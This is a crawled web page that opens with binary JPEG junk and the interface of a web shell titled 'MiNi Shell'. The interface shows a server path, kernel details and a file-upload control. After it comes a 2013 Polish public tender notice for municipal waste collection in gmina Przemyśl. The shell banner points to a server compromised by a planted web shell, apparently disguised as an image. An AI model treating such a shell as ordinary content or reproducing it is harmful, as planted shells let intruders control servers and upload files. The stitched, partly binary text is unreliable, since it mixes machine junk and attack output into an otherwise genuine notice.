JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131119/471302-N-2013.html

<p class="kh_header"><b>Przemyśl: Odbiór  i zagospodarowanie odpadów komunalnych  od właścicieli  nieruchomości zamieszkałych  gminy Przemyśl</b><br>
<b>Numer ogłoszenia: 471302 - 2013; data zamieszczenia: 19.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Przemyśl , ul. Borelowskiego 1, 37-700 Przemyśl, woj. podkarpackie, tel. 016 6704800 w. 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaprzemysl.home.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór  i zagospodarowanie odpadów komunalnych  od właścicieli  nieruchomości zamieszkałych  gminy Przemyśl.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest systematyczne odbieranie i zagospodarowanie odzysk lub unieszkodliwienie wskazanych w opisie zamówienia odpadów komunalnych z nieruchomości położonych na terenie gminy Przemyśl, na których zamieszkują mieszkańcy, w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania.
2. Dostarczenie do nieruchomości zamieszkałych worków do selektywnej zbiórki odpadów komunalnych w ramach zaoferowanej ceny.
3. Na terenie gminy Przemyśl obowiązywał będzie system mieszany pojemnikowo-workowy zbiórki odpadów komunalnych.
Charakterystyka przedmiotu zamówienia: 
1. Teren gminy Przemyśl wynoszący 10 863 ha obejmuje 16  miejscowości Bełwin, Grochowce, Hermanowice, Krówniki, Kuńkowce, Łętownia, Łuczyce, Malhowice, Nehrybka, Ostrów, Pikulice, Rożubowice, Stanisławczyk, Ujkowice, Wapowce, Witoszyńce.
4. Szacunkowa masa odpadów, które mogą zostać odebrane i zagospodarowane w czasie trwania zamówienia to: około 849,00 Mg odpadów niesegregowanych i około 100,00 Mg odpadów segregowanych. Do określenia szacunkowej masy przyjęto średnią miesięczną ilość odebranych odpadów w gminie Przemyśl w ciągu dziewięciu miesięcy roku 2013  styczeń -  wrzesień pomnożoną przez 12 miesięcy. 

Podana ilość zarówno nieruchomości, osób wytwarzających odpady  jak i ilość  wytwarzanych odpadów stanowi wielkość orientacyjną obliczoną na podstawie złożonych deklaracji oraz na podstawie informacji otrzymanych od firm wywożących odpady komunalne od właścicieli nieruchomości zamieszkałych. Zamawiający zastrzega sobie prawo zmiany tych danych w wyniku zasiedlenia nowych budynków lub wyludnienia oraz złożenia nowych deklaracji. Z tytułu zwiększenia lub zmniejszenia ilości odebranych odpadów Wykonawcy nie będą przysługiwały jakiekolwiek roszczenia. 
Trasa przejazdu Wykonawcy naniesiona została na mapę poglądową stanowiącą załącznik      nr 9  do SWIZ i wynosi około
 Bełwin			  2,06 km
Grochowce			  9,28 km
Hermanowice		  7,66 km
Krówniki			  6,52 km
Kuńkowce			11,55 km
Łętownia			  6,65 km
 Łuczyce			  3,71 km
Malhowice			  6,90 km
Nehrybka			  7,96 km
Ostrów			27,73 km
Pikulice			  5,80 km
Rożubowice		  3,31 km
Stanisławczyk		  2,49 km
Ujkowice			20,94 km
Wapowce			  6,97 km
Witoszyńce		  	  4,88 km

6. Odbieranie odpadów komunalnych, harmonogram
6.1 Odpady komunalne segregowane i niesegregowane powinny być zbierane w systemie indywidualnym u źródła w pojemnikach lub workach plastikowych do tego celu przeznaczonych  o odpowiedniej wytrzymałości zapewniającej bezpieczny z punktu widzenia technicznego 
i sanitarnego transport.
6.2 Wykonawca jest zobowiązany dotrzeć do osób wytwarzających odpady lub do miejsc ich gromadzenia i zebrać odpady zgromadzone w pojemnikach lub workach z terenu nieruchomości zamieszkałych. 
6.3 Odbiór odpadów z nieruchomości zamieszkałych następować będzie według harmonogramu sporządzonego przez wykonawcę wyłonionego w drodze przetargu, który przedłoży go do  zatwierdzenia przez zamawiającego. Harmonogram winien być przekazany Zamawiającemu  w terminie do 14 dni od dnia podpisania umowy.
6.4 Wykonawca rozpowszechniał będzie Harmonogram wywozu odpadów wraz z ulotkami   o rodzajach i terminach odbioru odpadów segregowanych bez naliczania dodatkowych opłat.
6.5 Harmonogram  powinien zostać sporządzony zgodnie z następującymi wytycznymi:
1) odbiór odpadów w danej miejscowości powinien przypadać zawsze na te same dni tygodnia -     odbiór odpadów powinien zostać ustalony   w ten sam dzień miesiąca np. każda 2 środa miesiąca dla szkła etc.
2) powinien wskazywać na daty odbierania poszczególnych rodzajów odpadów z nieruchomości
3) powinien być sformułowany  w sposób przejrzysty, jasny, pozwalający na szybkie zorientowanie się, co do konkretnych dat odbierania odpadów zawierający, co najmniej dane na temat: a) terenu wywozu(miejscowość), b) dnia tygodnia, c) rodzaju odbieranych śmieci, d) rodzaju nieruchomości (budynki jednorodzinne, wielorodzinne,)
4) w przypadku nieprzewidzianych okoliczności, za zgodą Zamawiającego, dopuszcza się zmianę terminu odbioru odpadów, w takim przypadku Wykonawca jest odpowiedzialny za bieżące poinformowanie Zamawiającego oraz właścicieli nieruchomości, których dotyczy zmiana.
6.6 Wykonawca jest obowiązany do odbierania odpadów komunalnych w terminach wynikających  z przyjętego harmonogramu odbioru, niezależnie od warunków atmosferycznych, w sposób nie zakłócający ciszy nocnej, pojazdami przystosowanymi do odbierania poszczególnych frakcji odpadów i w sposób wykluczający mieszanie odpadów.
6.7 W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamkniecie drogi, gdy nie jest możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym i Wykonawcą i może  polegać w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości, oraz innych terminów ich odbioru. W takich przypadkach Wykonawcy nie przysługuje dodatkowe wynagrodzenie.
6.8 Wykonawca obowiązany jest do odbierania odpadów komunalnych w sposób zapewniający utrzymanie odpowiedniego stanu sanitarnego, w szczególności zapobiegania wysypywaniu się odpadów z pojemników lub worków podczas dokonywania odbioru jak również uprzątnięcie nieczystości luzem powstałych podczas ładowania bądź w wyniku opóźnionego wywozu.
6.9 .Odpady segregowane  powinny być obierane w sposób wyodrębniony od odpadów zmieszanych. 
7. Częstotliwość odbioru odpadów komunalnych z nieruchomości zamieszkałych
7.1 Zmieszanych niesegregowanych odpadów komunalnych oraz pozostałości z sortowania gromadzonych w pojemnikach lub workach odbieranych z częstotliwością,  jeden raz na dwa tygodnie. 
7.2 Segregowanych odpadów komunalnych gromadzonych w odpowiednio oznakowanych workach lub pojemnikach i wystawionych na trasie odbioru podanych poniżej rodzajów odpadów:
a) papier i tektura, 
b) szkło białe i kolorowe,  
c) tworzywa sztuczne, metal, opakowania wielomateriałowe - łącznie,  
Częstotliwość odbioru odpadów  wymienionych w pkt. a-b -c   - raz na miesiąc.
7.3 Pozostałych odpadów:
a) odpadów wielkogabarytowych - Wykonawca jest obowiązany odebrać odpady wielkogabarytowe, które zostaną wystawione przez mieszkańców przed posesję lub przy osłonach śmietnikowych zgodnie z uzgodnionym z gminą harmonogramem, z  uwzględnieniem:
- zbierania osobnym transportem,
- rozpoczęcia zbiórki odpadów  w pierwszej kolejności dających się demontować w celu
  zapobieżenia ich demontażowi i dodatkowego zaśmiecania terenu,
- zabezpieczenia przewożonych odpadów przed rozsypywaniem w sposób  gwarantujący bezpieczeństwo ruchu drogowego - dwa razy  w roku  okres wiosenny i jesienny,
b) zużytego sprzętu elektrycznego i elektronicznego - dwa razy  w roku  okres wiosenny i jesienny,
Odbiorowi podlegają te odpady meble, sprzęt RTV i AGD oraz inne odpady wielkogabarytowe które zostały wystawione przed posesję przy krawędzi jezdni lub przy osłonach śmietnikowych w ustalonym według harmonogramu dniu. 
Odpady w postaci zużytego sprzętu elektrycznego i elektronicznego będą odbierane wyłącznie,  w przypadku gdy będą kompletne. Nie będzie odbierany sprzęt niekompletny zdemontowany, pozbawiony przez właściciela podstawowych podzespołów lub niespełniający definicji zużytego sprzętu elektrycznego i elektronicznego. 
7.4 Pozostałych odpadów: 
a) użytych opon o kodzie 16 01 03,
b) odpadów powstających w gospodarstwach domowych  przeterminowane leki i chemikalia, zużyte baterie, akumulatory itp. - raz w roku  okres wiosenny przy odbiorze elektrośmieci.
7.5 Odpadów budowlanych i rozbiórkowych pochodzących z prowadzenia drobnych prac niewymagających pozwolenia na budowę lub  zgłoszenia zamiaru wykonania robót budowlanych-  odbieranych na indywidualne zgłoszenie.
Odbiór odpadów budowlanych pochodzących z remontów i rozbiórek obejmują wyłącznie mieszkańców zabudowy jednorodzinnej i wielorodzinnej z wyłączeniem nieruchomości
niezamieszkałych, firm budowlanych, przedsiębiorców. Odbiór ww. odpadów odbywać się będzie poprzez wcześniejsze zgłoszenie celem podstawienia odpowiedniego pojemnika. Odpady zgromadzone w sposób nieprawidłowy tzw. luźny nie będą odbierane, o czym Wykonawca wcześniej powiadomi Zamawiającego.
7.6 Odpadów zielonych odbieranych w okresie od maja do października  z częstotliwością odbioru raz na miesiąc.
7.7 Odbiór odpadów selektywnych od mieszkańców gminyzarządzających, którzy zdeklarowali selektywną zbiórkę odpadów prowadzony będzie zgodnie z harmonogramem w tym samym dniu, co odpady zmieszane, lecz innym środkiem transportu, nie dopuszczając do zmieszania poszczególnych rodzajów odpadów.
8. Urządzenia do gromadzenia odpadów komunalnych           
8.1 Odpady komunalne mieszane:
a) w zabudowie jednorodzinnej o minimalnej pojemności 110 l - 120 l lub worki w kolorze czarnym o podwyższonej wytrzymałości i j pojemności 110 l -120l;
b) w zabudowie wielorodzinnej pojemniki o minimalnej pojemności 1100 l lub ich wielokrotność;
8.2 Odpady zbierane w sposób selektywny, takie jak papier i tektura, tworzywa sztuczne, szkło, opakowania wielomateriałowe oraz metal gromadzone będą w następujących pojemnikach:
a) w zabudowie jednorodzinnej  o minimalnej pojemności 110 l - 120 l lub worki o  pojemności             110 l-120l;
b) w zabudowie wielorodzinnej o minimalnej  pojemności 1100 l lub ich wielokrotność.
8.3  Do gromadzenia odpadów zielonych  worki  o minimalnej pojemności 110 l.
8.4 Do gromadzenia odpadów budowlanych i rozbiórkowych pochodzących ze strumienia odpadów komunalnych pojemniki o minimalnej  pojemności 120l lub worki o grubości dostosowanej do ilości               i rodzaju odpadów. 
Wykonawca zobowiązany jest posiadać  worki do segregacji odpadów z folii LDPE o grubości, co najmniej 0,07 [mm] na szkoło opakowaniowe i pojemności 120 litrów oraz worki do pozostałych frakcji o grubości, co najmniej 0,05 [mm] i pojemności 120 litrów. Worki winne być wykonane z folii przejrzystej umożliwiającej ocenę ich zawartości, opisane rodzajem odpadów , które należy w nich umieszczać.
8.5. Worki do gromadzenia odpadów komunalnych winny posiadać następujące kolory:
	a) kolor niebieski - papier i tektura,
	b) kolor żółty -  tworzywa sztuczne, metal i opakowania wielomateriałowe - łącznie
	c) kolor zielony - szkło bezbarwne i kolorowe,
	d) kolor brązowy -  odpady zielone,
	e) kolor czarny - odpady niesegregowane mieszane.

8.6 W ramach ceny Wykonawca przed na 7 dni przed rozpoczęciem realizacji zadania wyposaży właścicieli nieruchomości w worki na odpady segregowane ( na papier i tekturę, tworzywa sztuczne, metal, opakowania wielomateriałowe, szkło)  - w ilości 1 szt. na papier i tekturę,  1 szt. na szkło bezbarwne i kolorowe,  2 szt. na tworzywa sztuczne, metal  i opakowania wielomateriałowe- zbierane łącznie. 
Worki na odpady zielone Wykonawca dostarczy na miesiąc przed okresem zbiórki, która obowiązuje od miesiąca maja w ilości po 1 worku.
8.6.1 Przy każdorazowym odbiorze odpadów selektywnie zebranych Wykonawca wyposaży właścicieli nieruchomości, od których odebrano ww. odpady w worki w takiej samej ilości i rodzaju, jakie zostały odebrane. 
8.6.2 Po dostarczeniu worków, o których mowa w pkt 8.6 Wykonawca przedstawi Zamawiającemu wykaz nieruchomości, do których przekazano worki. W przypadku nieobecności właściciela danej posesji w dniu wyznaczonym na dostawę, worki zostaną pozostawione na posesji w widocznym miejscu, a fakt ten potwierdzony na wykazie przez pracownika Wykonawcy.
8.6.3 Wykonawca winien wliczyć koszt zakupu pierwszego kompletu worków oraz koszty bieżącego uzupełniania worków w cenie odpadów podanej w ofercie.
8.6.4 Wykonawca zobowiązany jest do posiadania w swojej ofercie handlowej usługi mycia  i dezynfekcji pojemników na odpady komunalne. Usługa ta wykonywana będzie wyłącznie na  koszt właściciela nieruchomości

8.7 Wykonawca dostarczy również worki czarne na odpady mieszane tylko w przypadku zapotrzebowania na nie. Koszt tych worków pokrywa właściciel nieruchomości.

9. Odbiór odpadów komunalnych segregowanych

9.1 Przy odbiorze odpadów segregowanych Wykonawca każdorazowo sprawdza: 
a) prawidłowość oznaczenia worków z odpadami segregowanymi,
b) rzetelność segregacji odpadów,
c) w przypadkach, gdy właściciele nieruchomości, którzy zadeklarowali, że odpady będą gromadzili    w sposób selektywny wystawiają je w sposób zmieszany, wykonawca niezwłocznie zgłosi ten fakt do Urzędu Gminy Przemyśl a odpady te odbiera, jako mieszane,
Na tę okoliczność Wykonawca sporządzi  np. dok. fotograficzną, notatkę, itp. umożliwiającą wydanie przez Zamawiającego decyzji administracyjnej ustalającej wyższą opłatę. 
9.2 Uchylanie się od obowiązku zgłaszania Urzędowi Gminy Przemyśl informacji dotyczącej
 zaistniałych nieprawidłowości w sposobie segregacji odpadów będzie stanowić naruszenie umowy .

10. Zagospodarowanie odpadów

10.1 Podmiot odbierający odpady komunalne od właścicieli nieruchomości jest zobowiązany do
przekazywania odebranych od właścicieli nieruchomości zamieszkałych  selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów, zgodnie z hierarchią postępowania odpadami, o której mowa w art. 17 ustawy  dnia 14 grudnia 2012 r, o odpadach ( Dz.U.  2013 r. poz. 21).
10.2 Wykonawca ma obowiązek zagospodarować odebrane odpady komunalne w sposób zapewniający osiągnięcie określonych w Rozporządzeniu Ministra Środowiska  dnia 29 maja 2012 r,     w sprawie  poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz.U.  2012 r. poz. 645) poziomów recyklingu,
przygotowania do ponownego użycia i odzysku następujących frakcji odpadów: papier i tektura, tworzywa sztuczne, szkło, metal tj. w roku 2014 - co najmniej 14 % .
10.3 Osiągnięte przez Wykonawcę poziomy recyklingu, przygotowania do ponownego użycia                      i odzysku obliczane będą na podstawie wzorów zawartych w Rozporządzeniu Ministra Środowiska  dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz.U. z 2012 r. poz. 645).
10.4 W celu osiągnięcia poziomów recyklingu, przygotowania do ponownego użycia i odzysku wskazanych frakcji odpadów, Wykonawca obowiązany jest do maksymalnego ułatwienia mieszkańcom nieruchomości pozbywania się odpadów papieru i tektury, tworzyw sztucznych, szkła powstających na terenie nieruchomości zamieszkałych min. poprzez odbieranie ww. odpadów zebranych w sposób selektywny u źródła.
10.5 Przekazywania odebranych od właścicieli nieruchomości zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania do regionalnej lub zastępczej instalacji do przetwarzania odpadów komunalnych, ze szczególnym uwzględnieniem instalacji właściwej dla regionu wschodniego zgodnie z uchwałą Nr XXIV/409/12 Sejmiku Województwa Podkarpackiego z dnia 27 sierpnia 2012 r. w sprawie przyjęcia projektu Planu Gospodarki Odpadami dla Województwa Podkarpackiego i uchwalenia Planu Gospodarki Odpadami dla Województwa Podkarpackiego. Wykonawca zobowiązany jest zagospodarować odbierane zmieszane odpady komunalne poprzez przekazanie ich do odzysku podmiotowi posiadającemu stosowne zezwolenie w tym zakresie tj. do czasu uruchomienia regionalnej instalacji zagospodarowania odpadów  w Przemyślu  powinny być dostarczone do instalacji zastępczej Przedsiębiorstwa Usług Komunalnych EMPOL, oś. Rzeka 133, 34-451 Tywonia            z lokalizacją w Młynach gmina Radymno. Fakt ten udokumentowany zostanie poprzez przedstawienie
Zamawiającemu kopii potwierdzonych za zgodność z oryginałem dokumentów potwierdzających odebranie tych odpadów.
10.6 Niedopuszczalne jest przekazywanie odebranych odpadów komunalnych bezpośrednio na składowisko odpadów, które nie spełnia wymogów regionalnej lub zastępczej instalacji do przetwarzania odpadów komunalnych.

11. Raporty i sprawozdania

11.1 Wykonawca jest zobowiązany do przekazywania Zamawiającemu miesięcznych raportów zawierających informacje o odpadach przekazanych do składowania na składowisku odpadów, nieprzekazanych do składowania na składowisku odpadów i sposobie ich zagospodarowania w tym:
a. ilości odebranych odpadów zmieszanych [Mg],
b. ilości odebranych odpadów szkła [Mg],
c. ilości odebranych odpadów papieru [Mg], 
d. ilości odebranych odpadów tworzyw sztucznych metali oraz opakowań wielomateriałowych [Mg],
e. ilości odebranych odpadów mebli i innych odpadów wielkogabarytowych, zużytych opon, sprzętu RTV/AGD [m3/sztuki],
f. ilość odebranych odpadów komunalnych ulegających biodegradacji [m3/Mg],
g. ilość gruzu budowlanego [Mg]
h. liczbę właścicieli nieruchomości, od których zostały odebrane odpady komunalne,
i.  sposobach zagospodarowania w/w odpadów i miejsc ich zagospodarowania. 
Raporty, o których mowa muszą być przekazane w formie elektronicznej uzgodnionej                                     z Zamawiającym.
Raport miesięczny jest podstawą do wystawienia faktury za wykonaną usługę.
11.2 Wykonawca jest zobowiązany do sporządzania kwartalnych sprawozdań i przekazywania ich Zamawiającemu w terminie do końca miesiąca następującego po kwartale, którego dotyczy , zgodnie z ustawą o utrzymaniu czystości i porządku w gminach.(tj. Dz. U. z 2012 r. poz. 391 i 951).
Ponadto wykonawca będzie prowadził i przedkładał zamawiającemu karty przekazania odpadów sporządzone zgodnie z obowiązującymi przepisami.
11.3 Wykonawca jest obowiązany do przedkładania Zamawiającemu kart przekazania odpadów zbieranych selektywnie, do miejsca ich odzysku, recyklingu lub unieszkodliwienia, jako załącznik do faktury za wykonanie usługi.
11.4  Rozliczanie świadczonych usług wywozu odpadów komunalnych następować będzie pomiędzy gminą Przemyśl raz w miesiącu, po zakończeniu miesiąca, za który wystawiana jest faktura,                        z terminem płatności do 21 dni od przedłożenia faktury wraz z kartami przekazania odpadów,                      o którym mowa w pkt. 11.3.
11.5 Wykonawca zobowiązany jest do prowadzenia ewidencji nieruchomości, z których zostały odebrane zmieszane i selektywnie zebrane frakcje odpadów oraz przekazywania jej Zamawiającemu w formie elektronicznej  nie rzadziej niż raz na kwartał.
 
12. Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami obowiązującymi w tym zakresie. Dotyczy to ewentualnego przeładunku odpadów, ich transportu, spraw formalno prawnych związanych z odbieraniem                            i dostarczeniem odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów komunalnych.
13. Jeżeli w toku realizacji zamówienia nastąpi uszkodzenie lub zniszczenie pojemników wynikłe                  z winy Wykonawcy, ich naprawienie i doprowadzenie do stanu poprzedniego należy do Wykonawcy.
14. Wykonawca przed złożeniem oferty, jeżeli uzna to za konieczne może zapoznać się z terenem, na którym działalność będzie prowadzona.
15. Zamawiający nie dopuszcza odbierania odpadów komunalnych zleconych przez Zamawiającego wspólnie z jakimikolwiek innymi odpadami pochodzącymi od właścicieli nieruchomości niezamieszkałych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.50.12.00-9, 90.51.10.00-2, 90.51.31.00-7, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 12 000,00 złotych  słownie dwanaście tysięcy  złotych.
Wadium może być wnoszone w jednej lub kilku następujących formach
a) pieniądzu
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
c) gwarancjach bankowych
d) gwarancjach ubezpieczeniowych
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia  9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy BGŻ S.A. Oddział Operacyjny w Przemyślu - BGŻ O/P 12 2030 0045 1110 0000 0090 7130 - 
z adnotacją wadium przetargowe - Odbiór  i zagospodarowanie odpadów komunalnych  od właścicieli  nieruchomości zamieszkałych gminy Przemyśl
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
Wadium wniesione w pieniądzu należy złożyć najpóźniej na dzień przed terminem otwarcia ofert tj. przed dniem 27.11.2013 r. 
Wniesione wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie kwota wadium znajdzie się na rachunku Zamawiającego.
Wadium wniesione w pieniądzu zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
Wadium wniesione w formie innej niż w pieniądzu, należy złożyć w formie oryginału, razem z ofertą, lecz w osobnej kopercie, oznaczonej nazwą Wykonawcy i adnotacją  wadium przetargowe - Odbiór  i zagospodarowanie odpadów komunalnych od właścicieli z nieruchomości zamieszkałych gminy Przemyśl
Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winny zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta poręczyciela.
Oferta niezabezpieczona wadium w jednej lub kilku z podanych wyżej form zostanie wykluczona bez rozpatrywania.
Wszelkie powyższe zapisy specyfikacji dotyczące sposobu oraz formy wadium dotyczą również ewentualnego przedłużenia terminy ważności wadium, o którym mowa w art. 181 ust. 2a ustawy.
Zamawiający zwraca niezwłocznie wadium, jeżeli
b) upłynął termin związania ofertą,
c) zawarto umowę w sprawie zamówienia publicznego,
d) Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy
a) który wycofał ofertę przed upływem terminu składania ofert,
a) który został wykluczony z postępowania,
b) którego oferta została odrzucona.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
Wykonawca, którego oferta została wybrana, odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
